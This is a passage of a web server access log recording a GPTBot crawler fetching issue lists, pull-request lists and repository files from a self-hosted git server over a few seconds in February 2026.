AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:18:16:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 10998] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:18:16:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11022] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:18:16:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:18:16:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:16:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:16:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:16:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:16:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:16:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=open&type=all" +[17/Feb/2026:18:16:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.py?display=rendered" [Client 74.7.227.38] [Length 11131] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.py" +[17/Feb/2026:18:16:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.spec?display=rendered" [Client 74.7.227.38] [Length 11131] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.spec" +[17/Feb/2026:18:16:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:18:16:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/Project%20Planning-1.md?display=source" [Client 74.7.227.38] [Length 36190] [Gzip 8.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/Project%20Planning-1.md" +[17/Feb/2026:18:16:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:16:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:18:16:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:18:16:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:16:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:16:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:16:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:16:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:16:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:16:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:16:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:16:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:16:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fPostgresPatrol-Debug.spec" [Client 74.7.227.38] [Length 21714] [Gzip 4.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol-Debug.spec" +[17/Feb/2026:18:16:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:16:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:18:16:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:16:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:16:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:16:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:18:16:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:16:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old-transport.hpp?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:18:16:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:18:16:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:16:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11619] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:16:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11615] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:16:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11617] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:16:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:16:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11611] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:16:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:16:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_debug.spec?display=rendered" [Client 74.7.227.38] [Length 11141] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_debug.spec" +[17/Feb/2026:18:16:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9921] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=all&type=all" +[17/Feb/2026:18:16:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9918] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:16:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10099] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:16:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12021] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:18:16:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10073] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:16:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10072] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:16:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10079] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:16:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10244] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:18:16:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:16:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.spec?display=source" [Client 74.7.227.38] [Length 12575] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.spec" +[17/Feb/2026:18:16:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr 